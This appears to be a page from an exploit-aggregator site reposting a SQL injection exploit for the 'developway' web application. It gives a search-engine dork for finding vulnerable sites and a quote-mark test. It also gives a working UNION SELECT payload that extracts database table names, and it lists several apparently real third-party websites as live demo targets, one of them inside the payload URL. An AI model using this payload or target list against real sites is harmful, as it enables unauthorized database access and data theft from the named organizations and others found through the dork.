Advertisement






developway SQL Injection

CVE Category Price Severity
Not specified CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2022-10-23
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100060

Below is a copy:

developway SQL Injection
[+] Title: developway SQL Injection
[+] Author: cymilad
[+] Vendor Homepage: http://www.developway.com
[+] Software Link: http://www.developway.com
[+] Tested on: Windows 10 & Google Chrome
[+] Category : Web Application Bugs
[+} Dork : intext:"Powered By DevelopWay"


### Note 1:

[+] Add the 1 quotation mark (') to the end of the link. :

* Target.com/products.php?cat=59'


### Note 2:

[+] To see the result, you have to press ctrl + u and then you can see the result in title tag

view-source:https://www.mit-est.com.sa/products.php?cat=43'+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--+


### Demo:

[+] http://qafsco.com/products.php?cat=59
[+] https://www.mit-est.com.sa/products.php?cat=43
[+] https://www.saadeldeentea.com/products.php?lang=En&cat=4041


### Contact Me:

* Telegram : @cymilad
* Email : [email protected]
* Instagram : @cymilad
* Twitter : @cymilad

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.